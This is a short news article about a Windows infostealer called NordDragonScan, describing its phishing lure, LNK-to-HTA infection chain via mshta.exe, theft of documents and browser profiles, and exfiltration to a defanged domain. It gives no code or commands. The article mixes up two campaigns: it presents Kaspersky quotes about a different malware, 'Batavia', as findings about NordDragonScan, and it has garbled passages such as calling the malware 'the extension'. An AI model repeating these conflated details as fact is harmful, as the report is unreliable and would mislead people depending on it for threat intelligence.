Security researchers have discovered a new data harvesting tool called NordDragonScan that is specifically aimed at Windows OS. Cara Lin found this malware, which has been ongoing since July 2024. It employs high-tech, cutting-edge tactics to penetrate the electronic systems of Russian companies.
NordDragonScan works by abusing a malicious Windows shortcut (LNK) file that launches a remotely hosted HTML Application (HTA). Once run, it quietly bludgeons its way through “mshta.exe” to perform its activities in the background—inappropriately gathering private information without a victim’s awareness.
As Lin explains, once installed, the malware can scan the host system for sensitive information and take other malicious actions.
“Once installed, NordDragonScan examines the host and copies documents, harvests entire Chrome and Firefox profiles, and takes screenshots,” – Cara Lin
The malware is capable of stealing documents, PDFs, and taking screenshots of the affected device. The extension can sniff user profiles from both Chrome and Firefox browsers. This unique capability greatly expands its data collection power.
According to Kaspersky, in just one year, over 100 users were victims of phishing emails. These emails were connected to the NordDragonScan campaign and had shaken dozens of organizations. These emails typically hide dangerous links under the guise of government contracts, baiting innocent targets into clicking on them.
“The targeted attack begins with bait emails containing malicious links, sent under the pretext of signing a contract,” – Kaspersky
When the user interacts with the email and runs the LNK file, NordDragonScan starts running in the background. The malware exfiltrates system-critical information, obviously seeking installed programs, drivers and even operating system components.
“As a result of the attack, Batavia exfiltrates the victim’s documents, as well as information such as a list of installed programs, drivers, and operating system components,” – Kaspersky
The data collected by NordDragonScan is sent to a domain located at the currently malicious site “ru-exchange[.]com”. Following this transmission, the malware quickly downloads a subsequent, as-yet-unknown executable. This action functions as the fourth-stage payload, lengthening its attack chain and maintaining persistence with the now-compromised systems.